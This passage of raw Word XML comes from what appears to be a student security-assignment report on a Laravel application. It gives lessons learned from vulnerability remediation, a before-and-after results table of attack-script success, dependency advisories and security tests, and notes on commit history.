              <v:group id="Group 26406" style="width:22.5pt;height:10.5pt;position:absolute;z-index:-2147483548;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:85.4297pt;mso-position-vertical-relative:text;margin-top:-0.844971pt;" coordsize="2857,1333">
                <v:shape id="Shape 2954" style="position:absolute;width:2857;height:1333;left:0;top:0;" coordsize="285750,133350" path="m9525,0l276225,0c278855,0,281100,930,282960,2791c284820,4651,285750,6896,285750,9525l285750,123825c285750,126442,284820,128699,282960,130535c281100,132395,278855,133325,276225,133350l9525,133350c6895,133325,4650,132395,2790,130535c930,128699,0,126442,0,123825l0,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> had </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">no </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rule, so nothing prevented it and nothing warned. Our CI asserts </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>the rule exists</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, not just that the file is currently absent.</w:t>
      </w:r>
      <w:r w:rsidR="00FA3666">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB45E12" w14:textId="77777777" w:rsidR="009078A9" w:rsidRDefault="009078A9">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421A3598" w14:textId="77777777" w:rsidR="009078A9" w:rsidRPr="005C54CB" w:rsidRDefault="009078A9">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602D2A8B" w14:textId="2039C9B1" w:rsidR="007F7EFB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="222" w:right="16" w:hanging="208"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>One error contract,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> defined once.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6267689B" w14:textId="4670605A" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="007F7EFB">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V-07 leaked SQL from ten call sites while </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GrnController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> gated the same thing correctly. Per-controller error handling means every controller is an opportunity to get it wrong. A single </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Handler::render(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">means an individual controller </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCC54F0" w14:textId="77777777" w:rsidR="007F7EFB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>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Threat-model the client boundary explicitly.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3424F82C" w14:textId="3FC60C22" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="007F7EFB">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V-10 and V-16 are the same mistake at two layers: treating the SPA as part of the system rather than as an untrusted client. Asking "what if this request did not come from our UI?" of each endpoint would have caught both.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F485882" w14:textId="77777777" w:rsidR="007F7EFB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>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Log security events before you need them.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09517F1D" w14:textId="58E333D5" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="007F7EFB">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V-11 meant the 20-attempt password spray in V-05b left no trace at all, and invoice cancellation actively erased its own evidence. Logging is cheap before an incident and impossible afterwards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C192E9" w14:textId="77777777" w:rsidR="007F7EFB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="222" w:right="16" w:hanging="208"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Reproducible provisioning as a security control.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168627D2" w14:textId="648C4387" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="007F7EFB">
      <w:pPr>
        <w:ind w:left="222" w:right="16"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 xml:space="preserve">Three defects (§5) meant the application could not be installed from source. An operator whose only option is to hand-patch the schema </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> diverge from the intended configuration which is how misconfiguration starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB9F7B9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="007F7EFB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="24"/>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9. Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42616B31" w14:textId="74077279" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
      <w:pPr>
        <w:spacing w:after="186" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10194" w:type="dxa"/>
        <w:tblInd w:w="38" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:tblCellMar>
          <w:left w:w="113" w:type="dxa"/>
          <w:right w:w="111" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2878"/>
        <w:gridCol w:w="4366"/>
        <w:gridCol w:w="2950"/>
      </w:tblGrid>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="72131D08" w14:textId="77777777" w:rsidTr="00A80C8A">
        <w:trPr>
          <w:trHeight w:val="424"/>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2E5A21BA"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b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Measure</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52CC97C3" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00A80C8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="2"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Before</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2F2F2" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DE700B7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00A80C8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4"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After</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="50B29337"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24DB0B8"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Attack scripts succeeding</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9816393"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b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12 / 12</w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> core suite + V-20 separate reproduction</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53D5EB59"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0 / 14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="5B26337D"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DC695AC"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Composer advisories</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668C883"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41</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2CE1527C"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="640F8274"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63923772" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> advisories</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B6605F9"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23 (2 critical, 14 high)</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4002170"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="6ADE71BD"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20C81E5"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Backend security tests</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4DFFB4A"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0</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FB84290"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90 (230 assertions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="492A6A6C"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2BE6149"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Frontend security tests</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CA710A7"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0</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00369623"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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="5C2C414C"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B41836E"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Security lint gate</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B5C0527"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none</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343E7C1D"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clean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="2C0CAA77"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28D1D581"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Framework</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4F887FD"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Laravel 10.50 (EOL)</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D85AB63"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Laravel 12.69.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="400600EA" w14:textId="77777777" w:rsidTr="00A80C8A">
        <w:trPr>
          <w:trHeight w:val="435"/>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7CF4653A"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Token lifetime</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6DC65A5"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unlimited</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0344349"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8 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="20354809" w14:textId="77777777" w:rsidTr="00A80C8A">
        <w:trPr>
          <w:trHeight w:val="433"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2878"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15DF018" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Audited security events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4366"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4BD08F73" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00A80C8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="2" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950"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FFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B1C1A9A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00A80C8A" w:rsidRDefault="008125F0" w:rsidP="00A80C8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A80C8A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14 event types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="023831BA" w14:textId="499798EC" w:rsidR="0011533D" w:rsidRDefault="0011533D" w:rsidP="004E5A61">
      <w:pPr>
        <w:spacing w:after="321"/>
        <w:ind w:left="0" w:right="16" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CBB8D89" w14:textId="77777777" w:rsidR="004E5A61" w:rsidRDefault="004E5A61" w:rsidP="004E5A61">
      <w:pPr>
        <w:spacing w:after="321"/>
        <w:ind w:left="0" w:right="16" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77693D5C" w14:textId="77777777" w:rsidR="004E5A61" w:rsidRDefault="004E5A61" w:rsidP="004E5A61">
      <w:pPr>
        <w:spacing w:after="321"/>
        <w:ind w:left="0" w:right="16" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0417CB" w14:textId="5CB4605B" w:rsidR="009D622B" w:rsidRDefault="008125F0" w:rsidP="009D622B">
      <w:pPr>
        <w:spacing w:after="321"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Commit history: The GitHub evidence below records four contributors, 11 branches and 30 commits in the reporting-period snapshot. The Insights view shows 0 files changed on main in that snapshot; the contributor branches preserve the individual work used for review and integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A5059" w14:textId="187DDE8C" w:rsidR="00D1427C" w:rsidRDefault="00D1427C" w:rsidP="00D1427C">
      <w:pPr>
        <w:spacing w:after="321"/>
        <w:ind w:left="24" w:right="16"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1427C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FCF5FF3" wp14:editId="06E8540E">
            <wp:extent cx="4767943" cy="2032032"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="32556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6515" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4778094" cy="2036358"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Figure 1. GitHub repository overview showing the SSD_Assigment project and its security evidence folders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DACC40" w14:textId="17E544EF" w:rsidR="00B52DDE" w:rsidRPr="005C54CB" w:rsidRDefault="009D622B" w:rsidP="00D1427C">
      <w:pPr>
        <w:spacing w:after="321"/>
        <w:ind w:left="24" w:right="16"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D622B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5192335B" wp14:editId="2F20E94D">
            <wp:extent cx="4958443" cy="2573627"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="113631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11107" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4971482" cy="2580395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B52DDE" w:rsidRPr="00B52DDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
